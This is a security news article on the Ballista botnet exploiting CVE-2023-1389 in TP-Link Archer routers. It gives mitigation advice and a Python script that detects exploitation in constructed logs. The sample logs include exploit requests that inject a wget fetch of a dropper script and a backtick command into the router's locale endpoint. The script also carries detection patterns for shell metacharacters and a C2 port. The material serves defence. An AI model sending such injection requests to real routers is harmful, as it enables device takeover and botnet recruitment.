A newly discovered botnet named ‘Ballista’ is actively exploiting a critical unauthenticated command injection vulnerability (CVE-2023-1389) in TP-Link Archer routers to achieve remote code execution. The botnet has already compromised over 6,000 devices worldwide, with infections concentrated in Brazil, Poland, the United Kingdom, Bulgaria, and Turkey. Security researchers warn that it poses a significant threat, particularly to organizations in the manufacturing, healthcare, technology, and service sectors.
First detected on January 10, 2025, Ballista exploits the flaw to run arbitrary shell commands on a vulnerable router without authenticating. The injected command fetches and runs a dropper script, ‘dropbpb.sh’, which in turn downloads and executes the main malware payload. Once installed, the malware opens an encrypted command-and-control (C2) channel over TCP port 82, through which operators issue remote commands, launch denial-of-service (DoS) attacks, and read and exfiltrate sensitive files from the device.
Security researchers have observed that Ballista is under active development. Recent variants have moved from hard-coded C2 IP addresses to Tor network domains, which makes the infrastructure harder to track and more resilient to takedown. Further analysis of the botnet’s infrastructure suggests possible links to a threat actor based in Italy, based on Italian-language strings found in the malware and the geographical location of some C2 servers.
Authorities and security researchers are actively tracking Ballista’s operations, with efforts underway to disrupt its infrastructure and mitigate its impact on affected networks worldwide.
To mitigate the risk of infection, TP-Link Archer router owners should install the firmware updates that address CVE-2023-1389. Because the vulnerable endpoint sits in the router’s web management interface, exposing that interface to the WAN is what puts a device within the botnet’s reach: disable remote management unless it is genuinely needed, and restrict it to trusted addresses if it is. Monitoring for the indicators described above (exploit requests against the management interface, downloads of ‘dropbpb.sh’, and the router itself opening outbound connections on TCP port 82) helps catch exploitation early. Note that patching closes the hole but does not undo an existing compromise; a router that sat exposed while unpatched should be treated as compromised rather than merely updated.
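The two indicators above lend themselves to simple log-based detection. The following is an added example, not code from the article or from the researchers who reported Ballista. It scans a router web-interface access log for CVE-2023-1389 exploitation attempts and a firewall connection log for the router itself talking to the C2 port. The request shape it keys on (shell metacharacters in the ‘country’ parameter of the locale form under /cgi-bin/luci/) is the one documented in public advisories for CVE-2023-1389 and is not described on this page; the log formats, addresses and the router IP 192.168.0.1 are constructed for the example.

```python
"""Added detection example: flag the Ballista indicators named in the article
in constructed router access and firewall connection logs."""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# CVE-2023-1389 request shape as documented in public advisories (not on this
# page): the 'country' value of the locale form reaches a shell unsanitised,
# so any shell metacharacter in that parameter is a strong exploitation signal.
LOCALE_PATH = re.compile(r"^/cgi-bin/luci/;stok=[^/]*/locale$")
SHELL_META = re.compile(r"[;&|`$<>]")

# Ballista C2 port named in the article.
C2_PORT = 82

HTTP_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CONN_LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)"
)

# Constructed sample logs (hypothetical; addresses from RFC 5737 ranges).
HTTP_LOG = """\
203.0.113.7 - - [10/Jan/2025:03:14:07 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://198.51.100.9/dropbpb.sh) HTTP/1.1" 200 512
192.168.0.10 - - [10/Jan/2025:03:15:00 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 128
192.168.0.11 - - [10/Jan/2025:03:16:22 +0000] "POST /cgi-bin/luci/;stok=a1b2c3/admin/status HTTP/1.1" 200 2048
203.0.113.7 - - [10/Jan/2025:03:17:45 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60id%60 HTTP/1.1" 200 512
"""
CONN_LOG = """\
2025-01-10T03:14:09Z src=192.168.0.1 dst=198.51.100.9 dport=80 proto=tcp
2025-01-10T03:14:12Z src=192.168.0.1 dst=198.51.100.9 dport=82 proto=tcp
2025-01-10T03:14:30Z src=192.168.0.20 dst=198.51.100.9 dport=82 proto=tcp
2025-01-10T03:15:00Z src=192.168.0.20 dst=93.184.216.34 dport=443 proto=tcp
"""


@dataclass(frozen=True)
class Finding:
    rule: str
    src: str
    evidence: str


def scan_http_log(text: str) -> list[Finding]:
    """Flag requests to the locale endpoint whose 'country' value carries shell
    metacharacters. Benign reads of the same endpoint are not flagged."""
    findings: list[Finding] = []
    for line in text.splitlines():
        m = HTTP_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not LOCALE_PATH.match(parts.path):
            continue
        # parse_qs percent-decodes and maps '+' to space, so encoded variants
        # such as %24%28 ("$(") or %60 (backtick) are inspected in decoded form.
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("country", []):
            if SHELL_META.search(value):
                findings.append(Finding("cve-2023-1389-command-injection", m["src"], value))
    return findings


def scan_conn_log(text: str, router_ips: set[str]) -> list[Finding]:
    """Flag the router itself opening an outbound connection to TCP/82, the
    Ballista C2 port; a router has no business initiating such traffic."""
    findings: list[Finding] = []
    for line in text.splitlines():
        m = CONN_LINE.match(line)
        if not m or m["src"] not in router_ips:
            continue
        if int(m["dport"]) == C2_PORT:
            findings.append(Finding("ballista-c2-port-82", m["src"], f'{m["dst"]}:{m["dport"]}'))
    return findings


if __name__ == "__main__":
    for f in scan_http_log(HTTP_LOG) + scan_conn_log(CONN_LOG, {"192.168.0.1"}):
        print(f"{f.rule:34} src={f.src:15} evidence={f.evidence}")
```

On the sample data the scanner reports two injection attempts from 203.0.113.7 (one carrying the dropper URL, one percent-encoded) and one outbound TCP/82 connection from the router, while the benign locale read, the unrelated admin request and the client-side connections pass. The port-82 rule covers the variant the article describes; the later Tor-based variant will not show up as a plain TCP/82 session, so a router initiating any unexpected outbound session remains the broader signal to alert on.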
The rapid spread of Ballista underscores the growing risks posed by unpatched IoT devices. Now more than ever, stronger network security practices are needed to defend against evolving threats. Otonata empowers individuals with expert insights, threat intelligence, and security solutions to stay ahead of evolving cyber threats like Ballista.